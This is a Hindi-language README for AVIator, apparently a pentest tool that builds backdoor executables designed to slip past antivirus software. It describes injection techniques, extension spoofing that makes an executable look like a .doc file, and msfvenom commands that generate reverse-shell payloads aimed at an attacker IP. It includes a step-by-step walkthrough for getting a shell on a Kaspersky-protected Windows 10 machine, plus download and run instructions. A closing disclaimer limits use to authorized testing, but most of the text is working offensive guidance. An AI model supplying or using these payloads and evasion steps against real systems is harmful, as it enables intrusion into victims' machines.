
Antivirus evasion project
AviAtor को NETCore 5 पर पोर्ट किया गया और अपडेटेड UI के साथ
परिचय://नाम
AV: एंटीवायरस
Ator: एक तलवारबाज, कीमियागर, वैज्ञानिक, जादूगर, विद्वान और इंजीनियर है, जिसमें कभी-कभी हवा से वस्तुएं उत्पन्न करने की क्षमता होती है (https://en.wikipedia.org/wiki/Ator)
परिचय://उद्देश्य
AV|Ator एक बैकडोर जनरेटर उपयोगिता है, जो AV डिटेक्शन को बायपास करने के लिए क्रिप्टोग्राफिक और इंजेक्शन तकनीकों का उपयोग करती है। और विशेष रूप से:
[https://attack.mitre.org/techniques/T1055/]:
Portable executable injection जिसमें दुर्भावनापूर्ण कोड को सीधे प्रक्रिया में लिखना शामिल है (डिस्क पर फ़ाइल के बिना) फिर अतिरिक्त कोड के साथ या रिमोट थ्रेड बनाकर निष्पादन को आमंत्रित करना। इंजेक्ट किए गए कोड का विस्थापन मेमोरी संदर्भों को पुनर्मैप करने के लिए कार्यक्षमता की अतिरिक्त आवश्यकता प्रस्तुत करता है। इस विधि के विविधताएं जैसे reflective DLL injection (प्रक्रिया में स्व-मैपिंग DLL लिखना) और memory module (प्रक्रिया में लिखते समय DLL मैप करना) एड्रेस रिलोकेशन समस्या को दूर करते हैं।
Thread execution hijacking जिसमें किसी प्रक्रिया के थ्रेड में दुर्भावनापूर्ण कोड या DLL का पथ इंजेक्ट करना शामिल है। Process Hollowing के समान, थ्रेड को पहले निलंबित किया जाना चाहिए।
एप्लिकेशन में एक फॉर्म है जिसमें तीन मुख्य इनपुट हैं (नीचे स्क्रीनशॉट देखें):

महत्वपूर्ण नोट: शेलकोड को C# बाइट ऐरे के रूप में प्रदान किया जाना चाहिए।
डिफ़ॉल्ट मानों में ऐसा शेलकोड होता है जो notepad.exe (32bit) को निष्पादित करता है। यह डेमो एक संकेत के रूप में प्रदान किया गया है कि कोड कैसे बनाया जाना चाहिए (msfvenom का उपयोग करके, यह -f csharp स्विच के साथ आसानी से किया जा सकता है, उदा. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp)।
प्रदान किए गए इनपुट भरने और आउटपुट पथ चुनने के बाद चुने गए विकल्पों के अनुसार एक निष्पादन योग्य फ़ाइल उत्पन्न होती है।
सरल शब्दों में, एक निष्पादन योग्य फ़ाइल को 'pdf', 'txt' आदि जैसे 'निर्दोष' एक्सटेंशन वाला दिखाने के लिए स्पूफ करना। उदा. फ़ाइल "testcod.exe" को "tesexe.doc" के रूप में व्याख्यायित किया जाएगा
इस तथ्य से सावधान रहें कि कुछ AV स्वयं स्पूफ को मैलवेयर के रूप में अलर्ट करते हैं।
मुझे लगता है आप सभी जानते हैं यह क्या है :)
पूरी तरह से अपडेटेड Kaspersky AV चलाने वाली Windows 10 मशीन में शेल प्राप्त करना
msfvenom का उपयोग करके पेलोड बनाएं
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
AVIator को निम्नलिखित सेटिंग्स के साथ उपयोग करें
लक्ष्य OS आर्किटेक्चर: x64
इंजेक्शन तकनीक: Thread Hijacking (शेलकोड आर्क: x64, OS आर्क: x64)
लक्ष्य प्रक्रिया: explorer (डिफ़ॉल्ट छोड़ें)
हमलावर मशीन पर लिसनर सेट करें
पीड़ित मशीन पर उत्पन्न exe चलाएँ
Windows:
या तो प्रोजेक्ट को कंपाइल करें या निम्नलिखित फ़ोल्डर से पहले से कंपाइल किए गए एक्जीक्यूटेबल को डाउनलोड करें:
https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries
Linux:
अपने लिनक्स वितरण के अनुसार Mono इंस्टॉल करें, बाइनरी डाउनलोड करें और चलाएँ
उदा. काली में:
root@kali# apt install mono-devel
root@kali# mono aviator.exe
एन्क्रिप्शन प्रक्रिया के लिए Damon Mohammadbagher को
मैंने इस ऐप को पेंटेस्ट प्रक्रिया की कठिन चुनौतियों को पार करने के लिए विकसित किया है और यह एकमात्र तरीका है जिससे इस ऐप का उपयोग किया जाना चाहिए। सुनिश्चित करें कि आपके पास किसी सिस्टम के विरुद्ध इसका उपयोग करने की आवश्यक अनुमति है और इसे कभी भी अवैध उद्देश्यों के लिए उपयोग न करें।